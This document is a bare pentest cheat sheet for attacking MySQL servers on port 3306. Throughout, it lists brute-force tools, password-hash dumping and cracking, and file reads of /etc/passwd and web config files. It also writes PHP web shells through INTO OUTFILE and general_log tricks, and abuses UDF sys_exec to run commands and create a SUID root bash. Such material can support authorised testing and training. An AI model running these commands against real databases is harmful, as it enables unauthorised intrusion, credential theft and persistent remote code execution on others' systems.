3306 - MySQL

nmap -sV -sC -p 3306 TARGET

mysql -h TARGET -u root
mysql -h TARGET -u root -p
mysql -h TARGET -u root -p'password'

hydra -L users.txt -P passwords.txt mysql://TARGET
crackmapexec mysql TARGET -u root -p passwords.txt

SELECT version();
SELECT user();
SELECT current_user();
SHOW DATABASES;
SELECT user, host, authentication_string FROM mysql.user;
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/var/www/html/config.php');
SELECT LOAD_FILE('C:\\Windows\\win.ini');

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

SHOW VARIABLES LIKE 'secure_file_priv';

searchsploit mysql udf
# Use lib_mysqludf_sys.so

CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id');
SELECT sys_exec('cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash');

CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.dll';
SELECT sys_exec('cmd /c whoami > C:\\Windows\\Temp\\output.txt');

-- MySQL 5.7+
SELECT user, authentication_string FROM mysql.user;

-- Older
SELECT user, password FROM mysql.user;

hashcat -m 300 hashes.txt /usr/share/wordlists/rockyou.txt

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT '<?php system($_GET["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';

nmap -p 3306 --script mysql-info TARGET
nmap -p 3306 --script mysql-enum TARGET
nmap -p 3306 --script mysql-brute TARGET
nmap -p 3306 --script mysql-databases --script-args mysqluser=root,mysqlpass='' TARGET